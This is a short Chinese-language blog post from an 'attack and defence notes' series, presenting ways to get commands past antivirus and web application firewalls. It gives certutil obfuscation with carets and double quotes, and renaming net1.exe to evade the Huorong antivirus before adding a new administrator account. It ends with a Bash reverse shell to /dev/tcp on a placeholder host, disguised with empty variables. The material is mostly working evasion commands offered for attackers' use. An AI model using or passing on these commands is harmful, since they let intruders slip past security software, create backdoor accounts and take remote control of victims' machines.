命令执行绕过

合集 - 攻防杂记(11)

1.防溯源总结2024-09-072.常见webshell管理工具流量分析2024-07-103.反弹shell不成功排查2024-06-064.c2隐藏&流量加密2024-05-215.todesk利用上线2024-04-216.proxifier+v2代理软件实现真全局代理（防溯源）2024-04-217.远程下载上传命令(绕过大小限制)2024-09-07

8.命令执行绕过2024-09-07

9.sqlserver下利用sqlps.exe白名单绕杀软2024-09-0710.bypass waf测试_rce2024-10-2511.bypass 安全狗宝塔waf测试_sql注入2024-10-25

收起

命令执行绕过

前言：仅提供一些绕过思路，对于较为敏感的命令基本已经失效了

1、多空一格

2、^混淆

certutil -u^rl^cache

3、拷贝文件名

copy C:\Windows\System32\certutil.exe xx.exe

之前绕过火绒添加用户案例

copy c:\windows\system32\net1.exe d:\update.exe

d:\update.exe user newuser password123 /add

net localgroup administrators newuser /add

4、修改文件资源绕过360

5、""混淆

ce""""rtu""til -url""""ca""che -spl""""it -f

6、未初始化变量绕过

在Linux中，可以利用Bash的未初始化变量来逃避Waf的检测。未初始化的变量会被视为一个空字符串。如果你尝试引用一个未初始化的变量 $u，它不会报错，而是会返回一个空值。

/bin$u/bash$u -i$u >&$u /dev$u/tcp$u/xx.xx.xx.xx$u/5003$u 0>&1$u